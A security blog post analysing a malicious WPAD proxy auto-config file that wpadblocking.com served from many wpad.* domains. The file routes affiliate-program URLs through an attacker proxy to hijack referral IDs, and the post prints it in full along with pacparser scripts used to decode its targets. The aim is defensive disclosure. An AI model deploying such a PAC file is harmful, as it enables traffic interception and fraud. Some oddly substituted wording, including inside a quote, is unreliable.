BadWPAD and wpad.pl / wpadblocking.com case (part 2)

blog.redteam.pl 5 lat temu
In second part of late published blog post “BadWPAD, DNS suffix and wpad.pl / wpadblocking.com case” [https://blog.redteam.pl/2019/05/badwpad-dns-suffix-wpad-wpadblocking-com.html] I would like to focus on analysis of (bad)WPAD file which was served by wpadblocking.com. The analyzed case included the following wpad.* TLDs, which we were able to find as related to this project:

wpad.cat
wpad.cc
wpad.computer
wpad.cz (Czech Republic)
wpad.direct
wpad.domains
wpad.ee (Estonia)
wpad.gr (Greece)
wpad.group
wpad.hr (Croatia)
wpad.im
wpad.info
wpad.it (Italy)
wpad.live
wpad.ltd
wpad.lv (Latvia)
wpad.name
wpad.network
wpad.pl (Poland)
wpad.plus
wpad.pro
wpad.sk (Slovakia)
wpad.systems
wpad.tv
wpad.tw (Taiwan)
wpad.vip
wpad.ws
wpad.xxx
wpad.zone

All above domains point to same malicious IP address 144.76.184.43.

As a short reminder of the most crucial information from our first part related to WPAD and BadWPAD attack:

Commonly Windows (i.a. Windows 10) has Web Proxy Auto-Discovery Protocol (WPAD) enabled by default, quoting Wikipedia this is: “Method utilized by clients to find the URL of a configuration file utilizing DHCP and/or DNS discovery methods. erstwhile detection and download of the configuration file is complete, it can be executed to find the proxy for a specified URL”. If DNS suffix will be set to awesome.redteam.pl, Windows requests wpad.dat file from WPAD servers until a server responds with the file. It tries different URLs within the domain:
1. http://wpad.awesome.redteam.pl/wpad.dat
2. http://wpad.redteam.pl/wpad.dat
3. http://wpad.pl/wpad.dat

Now we can see how powerful can it be to own wpad.* TLDs, especially national TLDs specified as i.a. wpad.cz (Czech Republic), wpad.ee (Estonia), wpad.gr (Greece), wpad.hr (Croatia), wpad.it (Italy), wpad.lv (Latvia), wpad.pl (Poland) and wpad.sk (Slovakia). For all of these and another wpad.* TLDs listed in the beginning of this blog post wpadblocking.com utilized the following malicious WPAD file [http://web.archive.org/web/20160316084421/http://wpad.pl/wpad.dat]:

// WpadBlock.com project
// Testing regular expressions
function FindProxyForURL(url, host) {
if( ( shExpMatch(url, "*//s?clic??a*pres?.c*/e/*") && !shExpMatch(url, "*aQNVZ?AU*") ) || ( shExpMatch(url, "*:/?e?or?.?w/*") && !shExpMatch(url, "*OZ?2?*") ) || ( shExpMatch(url, "*t*p:*sh*u*.t*te*eg*st*r") && !shExpMatch(url, "*new*") && !shExpMatch(url, "*ac*ru*s*") ) || ( shExpMatch(url, "h?t*/*w.b?*k?ng.c*m/*aid*") && !shExpMatch(url, "*3646?2*") && !shExpMatch(url, "*/aclk*") && !shExpMatch(url, "*noredir*") && !shExpMatch(url, "*gclid*") ) || ( ( shExpMatch(url, "*ttp:/*w?pl*s5?0.*/") || shExpMatch(url, "ht*w?pl*s5?0.*/*id=*") ) ) || ( shExpMatch(url, "*w?ce?*o.p?/C*ent*js*bun*e/b*/js*") ) || ( shExpMatch(url, "*t*ff?l*.be*-*-ho*.c*/p*ss*/*.as*bta*a_*") && !shExpMatch(url, "*a_7?59?b*") ) || ( shExpMatch(url, "*.?rs?c?m/??/") || shExpMatch(url, "*.?rs?d??we?3/") || shExpMatch(url, "*.?rs?c?m/we?3/") || (shExpMatch(url, "*.hr??*hot*?do*off*") && !shExpMatch(url, "*10?35?2?39*")) ) || ( shExpMatch(url, "*tt*/g?.s*le?m*i?.p?/*_*=*") && !shExpMatch(url, "*d=1?90*") ) || ( shExpMatch(url, "*p://af?.?pti*ar?.c??/*") && !shExpMatch(url, "*8?67*") ) || ( shExpMatch(url, "*p:*/w*.co?p*ial?a*ann?r*p*ef*") && !shExpMatch(url, "*75?6*6*") ) ) return "PROXY 144.76.184.43:80";
return "DIRECT";
}

It was described as “testing regular expressions” but in fact this was a deliberate man-in-the-middle (MITM) attack which most likely intent was to modify referrer IDs of affiliate programs just to gain money by a malicious actor. Most likely due to the fact that we only have a proof that they forwarded specified requests related to affiliate programs over their proxy. We don’t know what was precisely on the server-side but we can presume with a advanced probability based on facts which we will show below.

In the first blog post related to this case we already found that they catch Booking.com affiliate program URLs [https://blog.redteam.pl/2019/05/badwpad-dns-suffix-wpad-wpadblocking-com.html].

I didn’t wanted to rewrite any first JavaScript regexp (regular expression) [https://en.wikipedia.org/wiki/Regular_expression#Perl_and_PCRE] as this can possibly change the way of catching strings, so pacparser [https://github.com/manugarg/pacparser] library was used.

First task was to make the file more readable so each condition that returned malicious proxy was moved to a separate line:

(shExpMatch(url, "*//s?clic??a*pres?.c*/e/*") && !shExpMatch(url, "*aQNVZ?AU*")) ||
(shExpMatch(url, "*:/?e?or?.?w/*") && !shExpMatch(url, "*OZ?2?*")) ||
(shExpMatch(url, "*t*p:*sh*u*.t*te*eg*st*r") && !shExpMatch(url, "*new*") && !shExpMatch(url, "*ac*ru*s*")) ||
(shExpMatch(url, "h?t*/*w.b?*k?ng.c*m/*aid*") && !shExpMatch(url, "*3646?2*") && !shExpMatch(url, "*/aclk*") && !shExpMatch(url, "*noredir*") && !shExpMatch(url, "*gclid*")) ||
(shExpMatch(url, "*ttp:/*w?pl*s5?0.*/") || shExpMatch(url, "ht*w?pl*s5?0.*/*id=*")) ||
(shExpMatch(url, "*w?ce?*o.p?/C*ent*js*bun*e/b*/js*")) ||
(shExpMatch(url, "*t*ff?l*.be*-*-ho*.c*/p*ss*/*.as*bta*a_*") && !shExpMatch(url, "*a_7?59?b*")) ||
(shExpMatch(url, "*.?rs?c?m/??/") || shExpMatch(url, "*.?rs?d??we?3/") || shExpMatch(url, "*.?rs?c?m/we?3/") || (shExpMatch(url, "*.hr??*hot*?do*off*") && !shExpMatch(url, "*10?35?2?39*"))) ||
(shExpMatch(url, "*tt*/g?.s*le?m*i?.p?/*_*=*") && !shExpMatch(url, "*d=1?90*")) ||
(shExpMatch(url, "*p://af?.?pti*ar?.c??/*") && !shExpMatch(url, "*8?67*")) ||
(shExpMatch(url, "*p:*/w*.co?p*ial?a*ann?r*p*ef*") && !shExpMatch(url, "*75?6*6*"))

One of the most crucial task was to modify all regexps to only catch domains, not URLs as the only possible brute-force like way was to test these regexps on lists of domains, e.g. from AdBlock, Alexa, DNS zones etc. During the analysis of all regexps it was possible to find the fact that no of them can point only to HTTPS protocol (https://) but all regexps can point to HTTP URLs (http://). In our approach it wasn't crucial what is after the domain, as we wanted to find domains which were targeted in a MITM attack by general, so everything in the URL after the domain (/) was removed. Same was done with subdomains as it would make our approach much harder to find targets. After the modifications we ended with the following regexps:

(shExpMatch(url, "*//s?clic??a*pres?.c*/*")) ||
(shExpMatch(url, "*:/?e?or?.?w/*")) ||
(shExpMatch(url, "*t*p:*t*te*eg*st*r*")) ||
(shExpMatch(url, "h?t*/*b?*k?ng.c*m/*")) ||
((shExpMatch(url, "*ttp:/*w?pl*s5?0.*/*") || shExpMatch(url, "ht*w?pl*s5?0.*/*"))) ||
(shExpMatch(url, "*w?ce?*o.p?/*")) ||
(shExpMatch(url, "*be*-*-ho*.c*/*")) ||
(shExpMatch(url, "*hr??*hot*?do*off*")) ||
(shExpMatch(url, "*tt*/*s*le?m*i?.p?/*")) ||
(shExpMatch(url, "*p://*?pti*ar?.c??/*")) ||
(shExpMatch(url, "*p:*/*co?p*ial?a*ann?r*p*ef*"))

General usage of pacparser Python library looks as follows. We have any wpad.dat file like:

function FindProxyForURL(url, host) {
if(shExpMatch(url, "*be*-*-ho*.c*")) return "PROXY 144.76.184.43:80";
return "DIRECT";
}

We can parse it and test URLs against these conditions:

$ python3
Python 3.6.5 (default, Apr 1 2018, 05:46:30)
[GCC 7.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import pacparser
>>> pacparser.init()
>>> pacparser.parse_pac('wpad.dat')
>>> pacparser.find_proxy('https://www.bet-at-home.com');
'PROXY 144.76.184.43:80'

To automate the full approach we utilized Python one-liner combined with Bash one-liner:

$ echo -n http://www.bet-at-home.com | python3 -c "import sys;import pacparser;pacparser.init();pacparser.parse_pac('wpad.dat');print(pacparser.find_proxy(sys.stdin.read()));"
PROXY 144.76.184.43:80

The complete script was akin to this:

$ for domain in $(cat domains.txt);do echo -n http://$domain/ | python3 -c "import sys;input=sys.stdin.read();import pacparser;pacparser.init();pacparser.parse_pac('wpad.dat');print(input,pacparser.find_proxy(input));";done

Started our analysis utilizing .com region but with over 140 million domains it generated quite a few false positives so we ended up with utilizing Alexa top 1 million sites [http://s3.amazonaws.com/alexa-static/top-1m.csv.zip].

We found that the following condition:

(shExpMatch(url, "*t*ff?l*.be*-*-ho*.c*/p*ss*/*.as*bta*a_*") && !shExpMatch(url, "*a_7?59?b*")) ||

Is related to bet-at-home.com affiliate program:


Affiliate program URLs looks like this found in Google results, so regexp:

*t*ff?l*.be*-*-ho*.c*/p*ss*/*.as*bta*a_*

Compared to example URL:

https://affiliates.bet-at-home.com/processing/clickthrgh.asp?btag=a_59828b_23825

Second part of this condition matches the malicious actor affiliate program ID and due to this is negated (begins with !).

Another affiliate program which was found that way was salesmedia.pl:

(shExpMatch(url, "*tt*/g?.s*le?m*i?.p?/*_*=*") && !shExpMatch(url, "*d=1?90*")) ||

Example Google results with affiliate program URLs:


Regexp condition:

*tt*/g?.s*le?m*i?.p?/*_*=*

Example affiliate program URL from Google results:

http://go.salesmedia.pl/aff_c?offer_id=1062&aff_id=8502&url=...

Second part of this condition same as above matches malicious actor affiliate program ID (aff_id=) and due to this is negated (begins with !):

!shExpMatch(url, "*d=1?90*"))

Last case where we have found an affiliate program was a small different and based on regexps analysis:

(shExpMatch(url, "*.?rs?c?m/??/") || shExpMatch(url, "*.?rs?d??we?3/") || shExpMatch(url, "*.?rs?c?m/we?3/") || (shExpMatch(url, "*.hr??*hot*?do*off*") && !shExpMatch(url, "*10?35?2?39*"))) ||

Only the last part of this condition is negated (!) due to the fact that most likely as erstwhile this is an affiliate program ID of the malicious actor.

When we take a look on a first part of the condition:

shExpMatch(url, "*.?rs?c?m/??/") ||

There is simply a dot, next we have one char, next 2 are known “rs” and then it is one char, “c”, one char, “m” and “/”. It means that most likely this is “*.?rs.com/” due to the fact that char “/” is marking the end of a domain, and if 3rd position before “/” is not a dot (could be a 2 letter national TLD) then this is TLD “.com” as I guess with 99,99% probability.

Greping Alexa top 1 million sites with regexp rewritten in Bash matched the following domain:

$ grep ",.rs\.com$" top-1m.csv | head -1
48246,hrs.com

Example Google results:


Example URL:

http://www.hrs.com/web3/?client=pl__hrspartner&customerId=1043522679

Matches to the regexp condition:

shExpMatch(url, "*.?rs?c?m/we?3/")

All above proves that indeed it wasn’t a “regular expression test” but carefully prepared badWPAD attack to catch affiliate programs URLs and with advanced probability modified it on server-side, via malicious proxy, to change the IDs of referral and gain money that way.

We should never put trust in specified (private) projects as long they are not created by organisations which are credible, specified as CERTs with jurisdiction for utilized TLDs. Why then another anti-BadWPAD projects which own wpad.* TLDs point to 127.0.0.0/8 (localhost) but in the wpadblocking.com case it doesn’t? Forwarding traffic over their own proxy clearly suggests a malicious intent.

Keep in head that they _only_ execute MITM for affiliate programs – what if these wpad.dat files will be changed next day and start to catch all .exe files and change them via proxy with crypto malware? Well, it’s gonna be very bad and scale of problem will be very large in a short time. This is the main reason why all wpad.* TLDs should be sinkholed by CERTs, especially the ones owned by wpadblocking.com task and listed above. delight besides note that they served malicious content via badWPAD attack for over 10 years (!).

References

Idź do oryginalnego materiału